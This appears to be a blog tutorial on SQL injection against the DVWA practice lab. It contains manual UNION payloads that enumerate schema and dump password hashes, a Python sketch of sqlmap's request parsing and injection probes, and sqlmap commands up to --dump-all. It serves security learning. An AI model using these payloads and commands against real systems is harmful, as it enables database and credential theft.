Last time we retrieved the user passwords of DVWA by exploiting its SQL injection vulnerability by hand. This time we'll use sqlmap, a powerful and easy-to-use SQL injection exploitation tool, to dump the whole database. If you noticed, when I retrieved the DVWA user passwords I "guessed" that the column of the users table holding the passwords is called password. Had that guess been wrong, I would have injected UNION queries against the DBMS's information_schema database to enumerate the tables and columns of the database I was targeting. The catalog tables and the exact queries differ per DBMS, and the process is tedious and repetitive, which also means it can be automated. That is where sqlmap comes into the picture. sqlmap automates the whole dull process: through its CLI you can ask it to detect the injectable parameters of a web app, enumerate and dump whole databases, tables or columns, and it even has exploitation and password cracking features built in. We won't go through its exploitation and password cracking features, since we'll be using metasploit and hashcat for those purposes, but we'll see how to exploit the same SQL injection that we exploited manually last time, do some information gathering on the server and then dump all of its databases 😊
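To make concrete what sqlmap automates, here is the manual information_schema enumeration on MySQL, as an added example for this post (it is not part of the original article). It assumes the DVWA low-security page runs SELECT first_name, last_name FROM users WHERE user_id = '<id>', i.e. two columns in a quoted string context; the column count and the quoting are the two things you must get right for a UNION to work. Each payload is the value sent in the id parameter, followed by the full query the server ends up executing.

```sql
-- Assumed back-end query (DVWA "low" SQL Injection page, MySQL):
--   SELECT first_name, last_name FROM users WHERE user_id = '<id>';
-- The injected UNION must return exactly two columns to match the
-- original SELECT, and the trailing # comments out the closing quote.

-- 0. Find the column count first if you don't know it:
--    id = 1' ORDER BY 2 #   works
--    id = 1' ORDER BY 3 #   fails with "Unknown column '3' in 'order clause'"
SELECT first_name, last_name FROM users WHERE user_id = '1' ORDER BY 3 #';

-- 1. Version banner, current user and current database
--    (what sqlmap's --banner --current-user --current-db automate)
--    id = ' UNION SELECT @@version, CONCAT(user(), ' @ ', database()) #
SELECT first_name, last_name FROM users WHERE user_id = ''
  UNION SELECT @@version, CONCAT(user(), ' @ ', database()) #';

-- 2. Tables of the current database (the --tables step)
--    id = ' UNION SELECT table_name, table_schema FROM information_schema.tables
--          WHERE table_schema = database() #
SELECT first_name, last_name FROM users WHERE user_id = ''
  UNION SELECT table_name, table_schema
        FROM information_schema.tables
       WHERE table_schema = database() #';

-- 3. Columns of the users table (the --columns step); this is the query
--    that removes the need to "guess" that the column is called password
--    id = ' UNION SELECT column_name, data_type FROM information_schema.columns
--          WHERE table_schema = database() AND table_name = 'users' #
SELECT first_name, last_name FROM users WHERE user_id = ''
  UNION SELECT column_name, data_type
        FROM information_schema.columns
       WHERE table_schema = database() AND table_name = 'users' #';

-- 4. The dump itself (the -C user,password --dump step)
--    id = ' UNION SELECT user, password FROM users #
SELECT first_name, last_name FROM users WHERE user_id = ''
  UNION SELECT user, password FROM users #';

-- 5. Every database on the server (the --dbs step); only schemata the
--    DB user is allowed to see are listed
--    id = ' UNION SELECT schema_name, NULL FROM information_schema.schemata #
SELECT first_name, last_name FROM users WHERE user_id = ''
  UNION SELECT schema_name, NULL FROM information_schema.schemata #';
```

On MySQL both # and "-- " (with the trailing space) work as the closing comment; on other DBMSes the catalog views (for example Oracle's ALL_TABLES) and the comment syntax differ, which is exactly the per-DBMS bookkeeping sqlmap takes off your hands.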
Let's start by intercepting the HTTP request of the SQL Injection form using Burp, like we did for the HTTP login brute forcing. Copy the whole raw HTTP request (request line, headers and body, not just the body) and save it to a file named request. Make sure the Cookie header with your PHPSESSID and security cookies is included: DVWA requires a logged-in session, and without it sqlmap would only ever see the login page.
Now let's start sqlmap and pass the request file we saved with -r. sqlmap parses the raw request itself (method, URL, headers, body) and works out which parameters it can test for SQL injection. By default it tests GET and POST parameters; cookies are tested as well if you raise --level to 2 or more:
sqlmap -r request
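To show what sqlmap does with that file before it sends a single probe, here is a small Python stand-in for the -r parsing step, added for this post (it is not sqlmap's own code). It parses a raw Burp-style request, collects the parameters by location (query string, form body, Cookie header), applies the same default of leaving cookies alone until a higher level is requested, rebuilds a request URL with a payload in one parameter, and includes the simplest boolean-based decision rule. The two sample requests, the host and the cookie values are constructed for the example.

```python
"""Stand-in for what sqlmap's -r option does with a saved Burp request.
Added example for this post, not sqlmap's own code."""
from urllib.parse import urlsplit, parse_qsl, urlencode

# Constructed sample requests in the form Burp shows them; host, session id
# and credentials are made up for the example.
SAMPLE_GET_REQUEST = (
    "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1\r\n"
    "Host: 192.168.56.101\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: security=low; PHPSESSID=abc123\r\n"
    "Connection: close\r\n"
    "\r\n"
)

SAMPLE_POST_REQUEST = (
    "POST /dvwa/login.php HTTP/1.1\r\n"
    "Host: 192.168.56.101\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 44\r\n"
    "\r\n"
    "username=admin&password=password&Login=Login"
)

# Form buttons carry no user data worth testing (assumed skip list).
BUTTON_NAMES = {"submit", "login"}


def parse_request(raw):
    """Split a raw request into method, path, host and the parameters
    grouped by where they live: GET query, POST body, Cookie header."""
    raw = raw.replace("\r\n", "\n")            # tolerate files saved with LF only
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = {
        "GET": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "POST": {},
        "Cookie": {},
    }
    if body and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        params["POST"] = dict(parse_qsl(body.strip(), keep_blank_values=True))
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            params["Cookie"][name] = value
    return {"method": method, "path": parts.path,
            "host": headers.get("host", ""), "params": params}


def injectable_candidates(parsed, level=1):
    """(location, name, value) triples worth testing. GET/POST by default,
    Cookie values only from level 2 up, mirroring sqlmap's --level."""
    locations = ["GET", "POST"] + (["Cookie"] if level >= 2 else [])
    return [(loc, name, value)
            for loc in locations
            for name, value in parsed["params"][loc].items()
            if name.lower() not in BUTTON_NAMES]


def build_url(parsed, name, payload, scheme="http"):
    """Rebuild the request URL with one GET parameter replaced by payload,
    URL-encoded so quotes, spaces and # survive the trip to the server."""
    query = dict(parsed["params"]["GET"])
    query[name] = payload
    return f"{scheme}://{parsed['host']}{parsed['path']}?{urlencode(query)}"


def heuristic_probes(value):
    """First-pass checks: a stray quote to provoke a DBMS error, then a
    true/false pair whose responses differ if the input reaches SQL."""
    return {
        "error": value + "'",
        "true": value + "' AND '1'='1",
        "false": value + "' AND '1'='2",
    }


def looks_injectable(base_body, true_body, false_body):
    """Boolean-based rule: the TRUE probe should render like the normal page
    while the FALSE probe should not. sqlmap uses a fuzzy page comparison;
    exact equality is enough to show the idea."""
    return true_body == base_body and false_body != base_body


if __name__ == "__main__":
    for raw in (SAMPLE_GET_REQUEST, SAMPLE_POST_REQUEST):
        parsed = parse_request(raw)
        print(parsed["method"], parsed["path"])
        for loc, name, value in injectable_candidates(parsed, level=2):
            print(f"  {loc:6} {name}={value!r}")
    parsed = parse_request(SAMPLE_GET_REQUEST)
    print(build_url(parsed, "id", heuristic_probes("1")["error"]))
```

Running it prints id (and, at level 2, the two cookies) as candidates for the DVWA request, username and password for the login request, and the probe URL with the quote encoded as %27, which is the same first request sqlmap's heuristic check sends.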
sqlmap reports that the id parameter might be injectable, and its heuristic test also flags it as possibly vulnerable to XSS. It has also identified (correctly) that the back-end DBMS is MySQL and asks whether to skip the test payloads specific to other DBMSes, which we'll do (you can avoid the prompt on future runs by passing --dbms=mysql):
sqlmap confirms that id is injectable, great! It asks whether to keep looking for other injectable parameters, but we already have what we wanted.
sqlmap exits, but it saves what it learned about this request in its session files, so the following runs reuse the detected injection instead of testing again. Now let's do some information gathering by asking for the DBMS version banner (an outdated version may have known exploits), the current database and the current user:
sqlmap -r request --banner --current-user --current-db
Now let's see the tables of the dvwa database:
sqlmap -r request -D dvwa --tables
And the columns of the users table:
sqlmap -r request -D dvwa -T users --columns
And let's dump the user and password columns of the users table. Since the password column contains hashes, sqlmap will recognise them and offer to store them and crack them with a dictionary attack; we'll decline, since hashcat will do that job later:
sqlmap -r request -D dvwa -T users -C user,password --dump
But why bother with columns when we can dump the whole dvwa database? (In our case the database is very small.)
sqlmap -r request -D dvwa --dump
Can you see the stored XSS that we pulled off earlier? 😉
Now let's list all the databases on the server (the -D dvwa filter is not needed for --dbs, but it does no harm):
sqlmap -r request -D dvwa --dbs
And let's dump them all. On a real target think before you do this: --dump-all walks every table of every database, including the DBMS's own system databases unless you add --exclude-sysdbs, which is slow and very noisy in the target's logs:
sqlmap -r request --dump-all
Happy database dumping!